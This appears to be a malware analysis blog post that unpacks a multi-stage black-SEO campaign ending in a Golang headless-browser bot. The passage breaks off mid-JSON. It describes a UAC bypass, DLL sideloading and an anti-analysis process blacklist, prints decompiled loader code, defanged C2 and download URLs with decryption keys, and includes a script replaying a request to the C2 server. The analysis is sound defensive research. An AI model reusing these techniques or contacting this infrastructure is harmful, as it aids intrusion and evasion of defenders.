Get your swimsuit, we're diving into a black SEO scheme

Sample:
9da5191c78e49b46e479cdfe20004a9d76ccc4a545deeb83e3c07f83db9cf736 (Bazaar, VT)
Infection chain:
Zig downloader -> Python downloader/updater -> C++ downloader -> DonutLoader -> Golang final malware
Tools used:
Malcat, IDA Pro, DiE
Difficulty:
Beginner/intermediate

Last Friday, during a Malcat testing session, I stumbled upon a sample on Malware Bazaar uploaded by skocherhan, a sample without any convincing detection name. Since the sample looked fun, I posted the link on Malcat's discord server where I was quickly joined by Thomas Klemenc for a duo analysis session. And after a couple of hours, 5 malicious stages and 4 different programming languages later, we finally stumbled upon a rather niche black SEO campaign. While not very sophisticated, this sample is rather easy to follow and fun to unpack, making it a good target for a blog post. So get your swimsuit on and dive with us!

Note: since the analysis of this malware was a joint effort, this article has been written with two pairs of hands. Each chapter will be prefixed with either Renaud or Thomas depending on the author. We thought it would be more interesting this way!

Stage 1: An unknown sample

Thomas: Let us analyse the first binary (Bazaar, VT). Skimming over the strings, we find multiple interesting ones, such as:

  • WinHttpReadData
  • hxxps://down.temp-xy.com/update/python3.zip
  • svpy.exe
  • maintaindown.py
  • Zig WinHTTP Client

The binary seems to be created using the relatively new Zig programming language, which has yet to see widespread use in malware development, and also tends to trip up decompilers quite a bit. Luckily, it doesn't do a lot, so the functionality is quickly uncovered. The purpose of the binary is to download the file python3.zip from the following url:

  • hxxps://down.temp-xy.com/update/python3.zip

The archive contains a full python distribution, along with a small DLL named ISCSIEXE.dll and a suspicious script named maintaindown.py. Once downloaded, the archive is extracted and the following command is run:

  • svpy.exe maintaindown.py

The program svpy.exe is just a renamed pythonw.exe, which is used to run a python file without displaying a console window.

Stage 2: maintaindown.py

Renaud: The file maintaindown.py (uploaded to Malware Bazaar) is an obfuscated Python script with few detections on VirusTotal. While the code itself looks untouched, most of the strings are encrypted, which is annoying. Luckily, the script does not hide its decryption function. So let us just reuse that function to clean the Python file (I love Python malware :):

import base64
import re

# v-- copy-pasted from maintaindown.py
def _c_(ΒOQΙΕ0ΕBΕΙS_Ο_l: str) ->str:
    try:
        if not isinstance(ΒOQΙΕ0ΕBΕΙS_Ο_l, str
            ) or not ΒOQΙΕ0ΕBΕΙS_Ο_l.startswith('x'):
            return ΒOQΙΕ0ΕBΕΙS_Ο_l
        Zρρl_1_ΕΟΒ5_Ρ8_Q_ = int(ΒOQΙΕ0ΕBΕΙS_Ο_l[1:2])
        I1_lΙ1ι_ΡΤΕ = int(ΒOQΙΕ0ΕBΕΙS_Ο_l[2:3])
        QQIρΡ_lεοOΡ0_ = ΒOQΙΕ0ΕBΕΙS_Ο_l[3:]
        ΕρI28Τ1ΒΕο_I_8 = [lambda data: base64.b85decode(data.encode('utf-8'
            )).decode('utf-8'), lambda data: base64.b64decode(data.encode(
            'utf-8')).decode('utf-8'), lambda data: base64.b64decode(data.
            encode('utf-8'))[16:].decode('utf-8')]
        ΡZ1_l_2Q_Q_ε_O8Oβ = min(Zρρl_1_ΕΟΒ5_Ρ8_Q_ - 1, len(ΕρI28Τ1ΒΕο_I_8) - 1)
        ΡΤOQ_ιZε_ = QQIρΡ_lεοOΡ0_
        for _ in range(I1_lΙ1ι_ΡΤΕ):
            ΡΤOQ_ιZε_ = ΕρI28Τ1ΒΕο_I_8[ΡZ1_l_2Q_Q_ε_O8Oβ](ΡΤOQ_ιZε_)
        return ΡΤOQ_ιZε_
    except Exception as e:
        return ΒOQΙΕ0ΕBΕΙS_Ο_l

# just run the decryption function on all encrypted strings:
with open("maintaindown.py", "r", encoding="utf8") as f:
    data = f.read()
    res = re.sub(r"_c_\(\s*'(.*?)'\s*\)", lambda m: repr(_c_(m.group(1))), data)    # replace all calls to the decryption function _c_()
    print(res)

After running the script above, we get the following cleaned maintaindown.py: see on pastebin.
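For readers who do not enjoy homoglyph variable names, here is a readable sketch of what _c_() does. The function name decode_obfuscated and the test string are ours, not the malware's; the logic mirrors the copy-pasted function above: an encrypted string starts with 'x', followed by one digit selecting the decoder, one digit giving the number of rounds, and then the encoded payload.

```python
import base64

def decode_obfuscated(value: str) -> str:
    """Readable equivalent of _c_(): returns the input unchanged on any failure."""
    if not isinstance(value, str) or not value.startswith("x"):
        return value
    try:
        method = int(value[1])      # which decoder to use (1-based)
        rounds = int(value[2])      # how many times the decoder is applied
        payload = value[3:]
        decoders = [
            lambda d: base64.b85decode(d.encode("utf-8")).decode("utf-8"),
            lambda d: base64.b64decode(d.encode("utf-8")).decode("utf-8"),
            # third variant drops a 16-byte prefix after base64 decoding
            lambda d: base64.b64decode(d.encode("utf-8"))[16:].decode("utf-8"),
        ]
        decoder = decoders[min(method - 1, len(decoders) - 1)]
        for _ in range(rounds):
            payload = decoder(payload)
        return payload
    except Exception:
        return value

# Made-up test string (not taken from the sample): method 2 (base64), two rounds
inner = base64.b64encode(b"svpy.exe").decode("ascii")
sample = "x22" + base64.b64encode(inner.encode("ascii")).decode("ascii")
print(decode_obfuscated(sample))
```

Note that nothing here is keyed: the "encryption" is only nested base85/base64 encoding, which is why reusing the function is enough to clean the whole script.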

UAC bypass

The script first uses a known UAC bypass exploiting the DLL search order of iscsicpl.exe to load a malicious ISCSIEXE.dll (remember the tiny dll found in the archive?). And since iscsicpl.exe is an autoelevate binary, it can thus be used to run the DLL with elevated privileges.

Figure 2: The python3.zip archive downloaded by the first stage

The DLL is rather simple: it just runs the file \AppData\Local\Temp\runs.vbs, which maintaindown.py has previously written there. The VBS script simply uses WScript.Shell to re-run maintaindown.py, this time with elevated privileges.

Download and persistence

Once running with elevated privilege, the script will download and unpack (using the hardcoded password 'QwE123QwE123QwEl23QwE123') the two following ZIP archives:

  • hxxps://down.temp-xy.com/update/onedrive.zip, extracted to %localappdata%\Microsoft\OneDrive\setup
  • hxxps://down.temp-xy.com/update/onedrivetwo.zip, extracted to %localappdata%\Microsoft\Windows\Caches

Shortly after, the same script creates two scheduled tasks:

  • SvcPowerGreader (Task 1)

    TaskPath:
    \Microsoft\Windows\SoftwareProtectionPlatform
    Trigger:
    13 minutes after startup
    Action:
    Run OneDrivePatcher.exe from the archive onedrive.zip
  • PythonConverter (Task 2)

    TaskPath:
    \Microsoft\Windows\AppID
    Trigger:
    20 minutes after startup
    Action:
    Run Guardian.exe with the argument update.py from the archive onedrivetwo.zip

The script update.py, run by the second task, is in charge of updating the archive onedrive.zip. It downloads primarily from the same URL as before. But if that fails, it can additionally check an alternate url stored at:

hxxps://pastebin.com/raw/r1V9at1z

Currently, this points to hxxps://qu.ax/dcvwP.zip, which is identical to onedrive.zip.

The first archive, onedrive.zip, is more interesting and contains the third stage of the malware which will be described in the next chapter.

Stage 3: OneDrivePatcher.exe

Thomas: Stage 3, which now lives in %LocalAppData%\Microsoft\OneDrive\setup, consists of these files:

Figure 3: The "Onedrive" archive

The file OneDrivePatcher.exe is a legitimate Microsoft binary. The signature is valid, and the certificate chain ends in a trusted root CA:

Figure 4: "OneDrivePatcher" authenticode certificate

The same cannot be said about UpdateRingSettings.dll, which would also like you to believe it is signed by "Microsoft Corporation", but whose certificate is self-signed.

Figure 5: "UpdateRingSettings" authenticode certificate

The program OneDrivePatcher.exe imports and calls the function named GetUpdateRingSettingsManager from the .dll as one of the very first actions it takes in WinMain. Otherwise, it doesn't do anything that would be relevant here.

Figure 6: "OneDrivePatcher" imports
Figure 7: "OneDrivePatcher" calls GetUpdateRingSettingsManager()

Having a legitimate signed binary load a malicious dll is a common technique known as DLL sideloading. Used by many threat actors, the goal of this technique is usually to give a bit of legitimacy to the infection chain and sometimes bypass the weakest security solutions.

And indeed, all the important behavior stems from the side-loaded self-signed DLL. When one of its two exported functions is called, UpdateRingSettings.dll will perform the following steps:

  1. Anti-analysis checks
  2. Retrieve decryption keys
  3. Retrieve payload
  4. Decrypt and unpack payload

Anti-analysis checks

In UpdateRingSettings.dll, we encounter multiple anti-analysis checks, both in DllMain and in GetUpdateRingSettingsManager.

  • Exit if physical RAM is less than 0xC0000000 bytes (3 GiB)
  • Check if there are at least 1000 entries in the System event log
  • Check if a random 1000 - 2000 ms Sleep() takes at least 800 ms
  • Check if any of the running processes include one of these strings in their image path:

    wireshark processhacker fiddler
    procexp procexp64 taskmgr
    procmon sysmon ida
    x32dbg x64dbg ollydbg
    cheatengine scylla scylla_x64
    scylla_x86 immunitydebugger windbg
    reshacker reshacker32 reshacker64
    hxd ghidra lordpe
    tcpview netmon sniffer
    snort apimonitor radare2
    procdump dbgview de4dot
    detectiteasy detectit_easy dumpcap
    netcat bintext dependencywalker
    dependencies prodiscover sysinternals
    netlimiter sandboxie virtualbox
  • GetUpdateRingSettingsManager runs the same checks a second time, and additionally checks if the file CertificateIn.dat exists in the same directory as the dll. If it doesn't exist, the process exits as well.

If all the anti-analysis checks are successful, GetUpdateRingSettingsManager gets to work.
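If you want to know in advance whether your analysis VM would survive these checks, the thresholds listed above can be modelled in a few lines. This is only a sketch of the decision logic as we understood it, not code lifted from the DLL: the function name, the parameters and the case-insensitive comparison are our assumptions, and the blacklist is a short excerpt of the full list.

```python
MIN_RAM_BYTES = 0xC0000000        # 3 GiB
MIN_EVENT_LOG_ENTRIES = 1000
MIN_SLEEP_MS = 800                # a 1000-2000 ms Sleep() must take at least this long

# Excerpt of the blacklist shown above
BLACKLIST = ("wireshark", "procmon", "x64dbg", "ida", "ghidra", "sandboxie", "virtualbox")

def failed_checks(ram_bytes, event_log_entries, sleep_elapsed_ms, process_paths):
    """Return the names of the checks that would make the DLL bail out."""
    failed = []
    if ram_bytes < MIN_RAM_BYTES:
        failed.append("ram")
    if event_log_entries < MIN_EVENT_LOG_ENTRIES:
        failed.append("event_log")
    if sleep_elapsed_ms < MIN_SLEEP_MS:
        failed.append("sleep")
    # Substring match on the image path (lower-casing is our assumption)
    lowered = [path.lower() for path in process_paths]
    if any(name in path for path in lowered for name in BLACKLIST):
        failed.append("process")
    return failed

print(failed_checks(2 * 2**30, 10, 100, [r"C:\Tools\Wireshark\Wireshark.exe"]))
print(failed_checks(8 * 2**30, 5000, 1200, [r"C:\Windows\explorer.exe"]))
```

A fresh VM with 2 GiB of RAM, an empty event log and Wireshark running fails every single check, which probably explains part of the low sandbox detection rate.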

Retrieve decryption keys

Once all anti-analysis checks have passed, the program attempts to download two encryption keys. Looking at get_keys, we see that the URL is copied from the global at 0x18001BB50:

... which in turn gets written to by this function:

void **construct_key_URL() {
  __int16 v0; // ax
  unsigned __int64 v1; // r8
  unsigned __int64 v2; // rdx
  __int64 v3; // rbx
  __int16 v4; // ax
  void **v5; // rcx
  _DWORD v7[22]; // [rsp+20h] [rbp-60h]
  void **v8; // [rsp+78h] [rbp-8h]

  v8 = &g_key_URL;
  v0 = 23;
  v7[0] = 720919;
  v7[1] = 983051;
  v7[2] = 4521996;
  v7[3] = 5242960;
  v7[4] = 1048603;
  v7[5] = 1114120;
  v7[6] = 720977;
  v7[7] = 1179674;
  v7[8] = 5373967;
  v1 = 7;
  v7[9] = 393223;
  v7[10] = 1835089;
  v7[11] = 1179664;
  v7[12] = 1835088;
  v7[13] = 1769488;
  v7[14] = 5242906;
  v7[15] = 5308436;
  v7[16] = 458763;
  v7[17] = 11;
  *(_OWORD *)&g_key_URL = 0;
  v2 = 0;
  *(_QWORD *)&xmmword_18001BB60 = 0;
  *((_QWORD *)&xmmword_18001BB60 + 1) = 7;
  LOWORD(g_key_URL) = 0;
  v7[20] = 1;
  v3 = 0;
  while ( 1 )
  {
    v4 = v0 ^ 0x7F;
    if ( v2 >= v1 )
    {
      sub_180009950(&g_key_URL);
    }
    else
    {
      *(_QWORD *)&xmmword_18001BB60 = v2 + 1;
      v5 = &g_key_URL;
      if ( v1 > 7 )
        v5 = (void **)g_key_URL;
      *((_WORD *)v5 + v2) = v4;
      *((_WORD *)v5 + v2 + 1) = 0;
    }
    ++v3;
    v0 = *((_WORD *)v7 + v3);
    if ( !v0 )
      break;
    v1 = *((_QWORD *)&xmmword_18001BB60 + 1);
    v2 = xmmword_18001BB60;
  }
  return &g_key_URL;
}

The string is constructed from a list of 16 bit values stored in an array of DWORDs, XOR-ing each WORD with 0x7F. We can reconstruct it like so:

v7 = [720919, 983051, 4521996, 5242960, 1048603, 1114120, 720977, 1179674, 5373967,
      393223, 1835089, 1179664, 1835088, 1769488, 5242906, 5308436, 458763, 11]
out = []
for d in v7:
    for w in (d & 0xFFFF, (d >> 16) & 0xFFFF): # split into low and high 16 bits
        if w == 0:                             # terminating null WORD: not part of the string
            break
        out.append(chr(w ^ 0x7F))
print(''.join(out))

resulting in hxxps://down.temp-xy.com/code/k.txt which holds the 2 keys needed for decrypting the payload:

curl hxxps://down.temp-xy.com/code/k.txt
r9bKWWjJqBj5Rje630uA9tWZDDFM96ON
PcSLkpK7VNjshVw4SGLAi31fz83aRCSi

Retrieve the payload

Similar to the key URL, the payload URL gets constructed the same way:

void **construct_payload_URL() {
  __int16 v0; // ax
  unsigned __int64 v1; // r8
  unsigned __int64 v2; // rdx
  __int64 v3; // rbx
  __int16 v4; // ax
  void **v5; // rcx
  _DWORD v7[22]; // [rsp+20h] [rbp-60h]
  void **v8; // [rsp+78h] [rbp-8h]

  v8 = &g_payload_URL;
  v0 = 23;
  v7[0] = 720919;
  v7[1] = 983051;
  v7[2] = 4521996;
  v7[3] = 5242960;
  v7[4] = 1048603;
  v7[5] = 1114120;
  v7[6] = 720977;
  v7[7] = 1179674;
  v7[8] = 5373967;
  v1 = 7;
  v7[9] = 393223;
  v7[10] = 1835089;
  v7[11] = 1179664;
  v7[12] = 1835088;
  v7[13] = 1769488;
  v7[14] = 5242906;
  v7[15] = 5308428;
  v7[16] = 458763;
  v7[17] = 11;
  *(_OWORD *)&g_payload_URL = 0;
  v2 = 0;
  *(_QWORD *)&xmmword_7FF9EA72BC58 = 0;
  *((_QWORD *)&xmmword_7FF9EA72BC58 + 1) = 7;
  LOWORD(g_payload_URL) = 0;
  v7[20] = 1;
  v3 = 0;
  while ( 1 )
  {
    v4 = v0 ^ 0x7F;
    if ( v2 >= v1 )
    {
      sub_7FF9EA719950(&g_payload_URL);
    }
    else
    {
      *(_QWORD *)&xmmword_7FF9EA72BC58 = v2 + 1;
      v5 = &g_payload_URL;
      if ( v1 > 7 )
        v5 = (void **)g_payload_URL;
      *((_WORD *)v5 + v2) = v4;
      *((_WORD *)v5 + v2 + 1) = 0;
    }
    ++v3;
    v0 = *((_WORD *)v7 + v3);
    if ( !v0 )
      break;
    v1 = *((_QWORD *)&xmmword_7FF9EA72BC58 + 1);
    v2 = xmmword_7FF9EA72BC58;
  }
  return &g_payload_URL;
}

We reconstruct it using the script from earlier and get hxxps://down.temp-xy.com/code/s.txt
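Since both functions use the exact same encoding, a small reusable helper comes in handy. The sketch below is self-contained; the names decode_wide_string and defang are ours. It stops at the first null WORD like the C loop does, and it shows that the two arrays differ in a single DWORD (index 15), which is where 'k' becomes 's'.

```python
def decode_wide_string(dwords, key=0x7F):
    """Decode a UTF-16 string stored as XOR-ed WORDs packed into DWORDs."""
    chars = []
    for d in dwords:
        for w in (d & 0xFFFF, (d >> 16) & 0xFFFF):   # low WORD first, then high WORD
            if w == 0:                               # null terminator ends the string
                return "".join(chars)
            chars.append(chr(w ^ key))
    return "".join(chars)

def defang(url):
    """Make the URL non-clickable, as done throughout this article."""
    return url.replace("http", "hxxp", 1)

KEY_URL = [720919, 983051, 4521996, 5242960, 1048603, 1114120, 720977, 1179674, 5373967,
           393223, 1835089, 1179664, 1835088, 1769488, 5242906, 5308436, 458763, 11]

PAYLOAD_URL = list(KEY_URL)
PAYLOAD_URL[15] = 5308428      # the only value that differs between the two functions

print(defang(decode_wide_string(KEY_URL)))
print(defang(decode_wide_string(PAYLOAD_URL)))
```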

This file is then downloaded using WinHTTP functions. Interestingly, before actually downloading the file, two of the anti-analysis checks are run again: the check for CertificateIn.dat and the check for analysis tool names in running processes.

Looking at the downloaded file s.txt in Malcat, we immediately see that its entropy is very high throughout and that it contains no readable data, which most likely means it is compressed and/or encrypted (it turns out to be both).

Decrypt the payload

Back in the decompilation, backing out of get_payload into GetUpdateRingSettingsManager(), we can quickly spot a bit further down what looks like a decryption routine. It loops over the data and XORs each byte twice per iteration. Here's the function's pseudo-C code with renamed variables:

for ( i = 0; i < enc_data_length; ++i ) {
   key2_ptr = &key2;
   if ( v47 > 0xF )
     key2_ptr = (__int128 *)key2;
   temp_byte = *((unsigned __int8 *)key2_ptr + i % key2_length); // get byte of key2
   LOBYTE(temp_byte) = *((_BYTE *)enc_data + i) ^ temp_byte; // data[i] XOR selected key2 byte
   *((_BYTE *)enc_data + i) = temp_byte; // store back to data
   key1_ptr = &key1;
   if ( v50 > 0xF )
     key1_ptr = (__int128 *)key1;
   LOBYTE(temp_byte) = *((_BYTE *)key1_ptr + i % key1_length) ^ temp_byte; // XOR the intermediate byte with the selected key1 byte
   *((_BYTE *)enc_data + i) = temp_byte; // store the fully decrypted byte
}

The payload is decrypted in place using a two-stage XOR algorithm: each byte is first XORed with a repeating byte pattern from key 2, then XORed again with a repeating byte pattern from key 1.

Renaud: a quick tip to wannabe malware authors: XORing data with two keys of the same size does not make your encryption any stronger ^^
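To make the point concrete: XOR is associative and commutative, so applying two repeating 32-byte keys one after the other is strictly equivalent to applying a single 32-byte key, namely key1 XOR key2. The short sketch below checks this on dummy data (the helper name xor and the sample buffer are ours; the two keys are the ones from k.txt).

```python
from itertools import cycle

KEY1 = b"r9bKWWjJqBj5Rje630uA9tWZDDFM96ON"
KEY2 = b"PcSLkpK7VNjshVw4SGLAi31fz83aRCSi"

def xor(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

combined = xor(KEY1, KEY2)          # both keys are 32 bytes long
sample = bytes(range(256)) * 2      # dummy "ciphertext"

two_pass = xor(xor(sample, KEY2), KEY1)   # what the DLL does
one_pass = xor(sample, combined)          # what it boils down to
print(two_pass == one_pass, len(combined))
```

It also means the order in which the two keys are applied does not matter, which is why a decryption script can XOR with key 1 first even though the DLL starts with key 2.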

To retrieve the payload, we could either dump it from memory, or decrypt it ourselves:

import sys

ENCRYPTED_FILE = r"C:\Users\user\Downloads\s.txt"
DECRYPTED_OUTPUT_FILE = "decrypted.bin"

KEY1_STR = "r9bKWWjJqBj5Rje630uA9tWZDDFM96ON".encode('ascii') # from k.txt
KEY2_STR = "PcSLkpK7VNjshVw4SGLAi31fz83aRCSi".encode('ascii')

with open(ENCRYPTED_FILE, 'rb') as f:
    encrypted = f.read()
    decrypted = bytearray()
    data_len = len(encrypted)
    for i in range(data_len):
        temp = encrypted[i] ^ KEY1_STR[i % 32]  # XOR with byte of key1 
        dec_byte = temp ^ KEY2_STR[i % 32]  # then XOR with byte of key2
        decrypted.append(dec_byte)
    with open(DECRYPTED_OUTPUT_FILE, 'wb') as f:
        f.write(decrypted)

The resulting file is ZLIB-compressed

Figure 14: s.txt decrypted

so we quickly add decompression to our script:

import sys
import zlib

ENCRYPTED_FILE = r"C:\Users\user\Downloads\s.txt"
DECRYPTED_OUTPUT_FILE = "decrypted.bin"

KEY1_STR = "r9bKWWjJqBj5Rje630uA9tWZDDFM96ON".encode('ascii')
KEY2_STR = "PcSLkpK7VNjshVw4SGLAi31fz83aRCSi".encode('ascii')

with open(ENCRYPTED_FILE, 'rb') as f:
    encrypted = f.read()
    decrypted = bytearray()
    data_len = len(encrypted)
    for i in range(data_len):
        temp = encrypted[i] ^ KEY1_STR[i % 32]  # XOR with byte of key1
        dec_byte = temp ^ KEY2_STR[i % 32]  # then XOR with byte of key2
        decrypted.append(dec_byte)
    decompressed = zlib.decompress(decrypted)
    with open(DECRYPTED_OUTPUT_FILE, 'wb') as f:
        f.write(decompressed)

This yields us stage 4 (you're still with us, right?), a shellcode blob. The blob is finally run in a separate thread via a call to CreateThread.

Stage 4: Donut shellcode

Thomas: After decrypting and decompressing the downloaded file, we get a 10 MiB shellcode blob. DiE tells us that it is Donut shellcode:

Figure 15: Detect It Easy identifies DonutLoader

Donut is a shellcode generator and reflective loader for unmanaged and managed Windows payloads. A quick look at the binary in Malcat's hex editor confirms the assumption: it shows the typical Donut first bytes, namely a call opcode (E8) followed by the same integer twice. The first one is the call's relative target offset, the second is the size of the Donut instance.
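This header pattern is easy to check programmatically. The sketch below encodes only what is described above: an E8 opcode byte (the x86 near call), then two identical little-endian 32-bit integers. The function name and the extra sanity check on the size are our own additions, and a match is of course only a hint, not a proof.

```python
import struct

def looks_like_donut(blob: bytes) -> bool:
    """Heuristic check for the Donut prologue: E8 <rel32> <instance size>."""
    if len(blob) < 9:
        return False
    opcode, rel32, instance_len = struct.unpack_from("<BII", blob, 0)
    return (
        opcode == 0xE8                      # near call
        and rel32 == instance_len           # call jumps right past the instance
        and 0 < instance_len < len(blob)    # sanity check (our assumption)
    )

# Synthetic example, not the real blob
fake = b"\xE8" + struct.pack("<II", 0x100, 0x100) + bytes(0x200)
print(looks_like_donut(fake))
print(looks_like_donut(b"\xE9" + fake[1:]))
```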

We'll set the file type to Shellcode and force a function start at the beginning of the file. This will trigger Malcat's CFG recovery algorithm.

Figure 17: Setting the shellcode entry point

Now we'll ask Kesakode again what it thinks of the sample. It now correctly identifies it as DonutLoader as well, and thus confirms what we already assumed.

Figure 18: Kesakode identifies DonutLoader

Donut supports optional encryption of the payload, which was not used in this sample. The compression algorithm used is XPRESS, Microsoft's implementation of the LZ77 algorithm. It is designed for speed and is used quite heavily in Microsoft products, for example in SMB, WSUS, and Windows.

Donut uses the Windows API RtlCompressBuffer for compression, and the matching Windows decompression API was used to decompress the sample. We wrote a quick script that scans for the header, which consists of 2 integers (compressed and decompressed size), and decompresses the final payload, described in the next chapter.

Renaud: a (native) Xpress decompression transform will be added to the next version of Malcat.

Stage 5: Golang stealth automated browser

Renaud: Now that the DonutLoader is out of the way, we can have a look at what we hope is the final stage of the malware. So what did we get, and what could justify such a convoluted chain of infection? An infostealer? An APT?

What we are looking at is a 20MB Golang sample of sha256 e94ec5980d1f7cc5b9ece979caf01803b6f75408ebaa83016f3071514a73d443 (Bazaar, VT), again without any convincing detection. Kesakode gives a relatively low 43% detection verdict toward StowAway. After further inspection this looks like a false positive, since most of the detections are library functions (e.g. an HTTP library also used by StowAway).

Note: while Kesakode often points you in the right direction, you still have to cross-check function and string hits to see if the detection makes sense, especially for low scores and for programming languages that pack all libraries statically (such as rust or Golang).

Judging by the entropy, the sample does not look packed, but the Golang symbols have been scrambled, which should make the analysis of such a large binary more difficult. Additionally, while we can see many chromium and browser-related strings in the binary, nothing obviously malicious has come to our attention.

Figure 19: A Huge Golang binary

Now I don't know about you, but reversing 20MB of scrambled Golang is not really my definition of fun. If we want to learn what this malware is up to, we will have to resort to other methods.

Dynamic analysis

First things first, let us try to run the sample inside a sandbox. A quick look at Hybrid Analysis's report tells us that the sample spawns several headless Chrome instances:

Figure 20: Hybrid analysis: headless chrome instances are started

Most of the network traffic seems to land on Google-related websites. One domain stands out though: a POST request is made to the URL hxxps://git.temp-xy.com. Sadly, that doesn't really help us identify the malware.

Figure 21: Hybrid analysis: HTTPS traffic

Using the packet information provided by the sandbox logs, we can write a small Python script that replays the sent packet:

import requests
data = requests.post("hxxps://git.temp-xy.com", headers={   # headers inferred from the sandbox report (URL is defanged)
    "Hash": "",
    "Id": "89c376f27cc6bdcae1ef5173a42110ad048dec74cc5a643fe1bc33f3730662c",
    "Task-Id": "",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Geck0) Chrome/99.0.0.0 Safari/537.1",
    "Accept-Encoding": "gzip"})
print(data)

The response is a 1732-byte (the size seems to never change) base64-encoded text blob. Once decoded, the content sadly appears to be encrypted and changes every time. This could mean that either the key is embedded in the response, or that nonce-based encryption is used. Interesting, but not very helpful.

Figure 22: Response packet from hxxps://git.temp-xy.com

Looking for embedded content

Another way to discover the intent of the Golang program is to ignore the 8MB of code and look at the data inside the program. The first thing that comes to our attention are the two ZIP archives embedded inside the .data section:

  • A 130KB Chrome extension at address 0x169a849. This appears to be the (clean) NopeCHA Chrome extension
  • A 358KB Chrome extension at address 0x16bb809. This appears to be the (clean) Buster captcha Chrome extension

This is rather interesting. While password-stealing chrome extensions are commonly found in infostealers, legit extensions are not. If we add this information to what we have learnt via the sandbox report, it does seem that this malware may act like an automated browser.

Figure 23: The NopeCHA chrome extension

But we are not finished with our tour. Looking at the list of anomalies in Malcat, we can see that the file embeds a huge base64 string at address 0xefbb0e. And we malware analysts love our base64 strings!

Figure 24: Huge base64 string found inside the binary

Now the size of the string reported by Malcat is too short, mostly because of the heuristics used to identify Golang strings. But by simply following references to the string, we can quickly learn that the base64 string has a size of 0x132c50.

Tip: if you want to select the whole string in Malcat, it is easy! Just select the beginning of the string, then right-click on the selection and choose Change selection size. You can also simply scroll to the end of the base64 string and shift+click, but precision is key.

Figure 25: Getting the size of the base64 string

We can then use Malcat's transforms to unpack the base64 string. The decoded content starts with the bytes 1F 8B which is the magic signature for GZIP archive. Once decompressed, we obtain a new PE file:

Figure 26: The huge base64 string is a gzipped Golang program
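If you do not have Malcat at hand, the same two transforms are a few lines of Python. This is a sketch under assumptions: unpack_embedded and carve are our own helper names, and whether 0xefbb0e is usable directly as a file offset depends on how your tool displays addresses, so double-check before carving. The demo below runs on a synthetic blob rather than on the real sample.

```python
import base64
import gzip

GZIP_MAGIC = b"\x1f\x8b"

def carve(path: str, offset: int, size: int) -> bytes:
    """Read `size` bytes at file offset `offset` (e.g. the 0x132c50-byte string)."""
    with open(path, "rb") as f:
        f.seek(offset)
        return f.read(size)

def unpack_embedded(b64_blob: bytes) -> bytes:
    """base64-decode, verify the GZIP magic, then decompress."""
    raw = base64.b64decode(b64_blob)
    if not raw.startswith(GZIP_MAGIC):
        raise ValueError("decoded data is not a GZIP stream")
    return gzip.decompress(raw)

# Synthetic stand-in for the embedded string: a gzipped, base64-encoded fake "PE"
fake_pe = b"MZ" + bytes(62)
blob = base64.b64encode(gzip.compress(fake_pe))
unpacked = unpack_embedded(blob)
print(unpacked[:2], len(unpacked))
```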

This new PE file is a 2MB Golang program of sha256 1d11bec16a63d85a386c47fb97914ad13318f7fdcbf399c5a895cf642307f115. Now don't get fooled by all the detections you can see on Malware Bazaar or VirusTotal, this binary is actually ... clean! Since it is not obfuscated, tracing its origin is relatively easy. As always for Golang programs, the first location to inspect is the function main.main. We can see in this function that the program accepts a command line argument named --version, and that the version is hardcoded to the value adb80298fa6a3af7ced8b1c9b5f18007:

Figure 27: main.main() of the embedded program

A quick online search for this particular version tag brings us to the GitHub repository of the leakless tool, a Golang utility used to terminate unresponsive programs. Further inspection of the repository source code even gives us our original base64 string. Now why all the false positives from the antivirus industry for such a simple tool? Well, according to Stack Overflow, leakless is used not only by other libraries such as go-rod, but also by numerous malware families:

Figure 28: Stackoverflow: leakless seems to be embedded in other malware

Wait, according to its GitHub repository, go-rod is a Golang library used to drive headless Chrome instances using Chrome's DevTools protocol. This sounds familiar... could it be that our first huge Golang binary uses go-rod? A quick string search tells us that yes!

Figure 29: go-rod related strings found in the first Golang binary

Command and control protocol

So, back to the first big Golang executable. We know it uses go-rod (and leakless) to drive several headless chrome processes, and that it uses chrome extensions to automatically bypass captchas. But which sites are visited and why remains unknown. What could help is decrypting the response sent by the server at hxxps://git.temp-xy.com. With some luck, we'll find more information there.

So we are back looking at the list of anomalies found in the first Golang program. Other Base64 strings have been identified by Malcat. The first one, located at 0xed113b, seems interesting, since it is the url of our C&C server candidate:

Figure 30: Url of the C&C server is stored encoded in base64

The second string, located at 0xed117b, is even more interesting, for several reasons:

  • It is referenced just after an http "POST" function is called
  • Right after the string is referenced, a function is called that references strings containing the words "AES-GCM"
  • While it is never base64-decoded, its size is 32 bytes, which works well with AES
Figure 31: Second "base64" string is used in crypto-related functions

Could AES-GCM be the algorithm used by the malware to communicate with its C&C server? It is a nonce-based algorithm after all. Instead of reversing the binary further, let us test our hypothesis. Usually with the GCM mode, messages are prefixed with a 12-byte nonce, followed by the actual ciphertext. It's not a rule, but that's the most straightforward way to transmit the nonce. Let us try to decrypt one of the captured packets from earlier in Malcat:

Figure 32: Decrypting the command and control protocol
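For those who prefer a script over the Malcat transform, the assumed message layout can be written down as follows. Everything here is a sketch of our hypothesis: a 12-byte nonce, then the ciphertext with the usual 16-byte GCM tag appended, all of it base64-encoded. The function names are ours, the key is left as a parameter (it is the 32-byte string found at 0xed117b, used as raw ASCII bytes), and the decryption part relies on the third-party cryptography package.

```python
import base64

NONCE_LEN = 12   # usual GCM nonce size
TAG_LEN = 16     # GCM authentication tag, assumed to be appended to the ciphertext

def split_gcm_message(b64_response: str):
    """Split a base64 response into (nonce, ciphertext_with_tag)."""
    raw = base64.b64decode(b64_response)
    if len(raw) < NONCE_LEN + TAG_LEN:
        raise ValueError("response too short for nonce + tag")
    return raw[:NONCE_LEN], raw[NONCE_LEN:]

def decrypt_response(b64_response: str, key: bytes) -> bytes:
    """Decrypt with AES-GCM; requires `pip install cryptography`."""
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM
    nonce, ciphertext = split_gcm_message(b64_response)
    return AESGCM(key).decrypt(nonce, ciphertext, None)

# Layout demo on dummy bytes (no real traffic, no real key)
dummy = base64.b64encode(bytes(range(12)) + b"C" * 40).decode("ascii")
nonce, ciphertext = split_gcm_message(dummy)
print(len(nonce), len(ciphertext))
```

A nice side effect of GCM is that decryption fails loudly on a wrong key or a wrong layout, so a successful decryption is a strong confirmation of the hypothesis.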

It works! We get some nice JSON. Most of the keys seem to be utf-8 encoded Chinese words though. After translation, the response from hxxps://git.temp-xy.com looks like this:

[
  {
    "action": "wait",
    "description": "wait 5000-20000 seconds",
    "wait_time": "1-5"
  },
  {
    "action": "google",
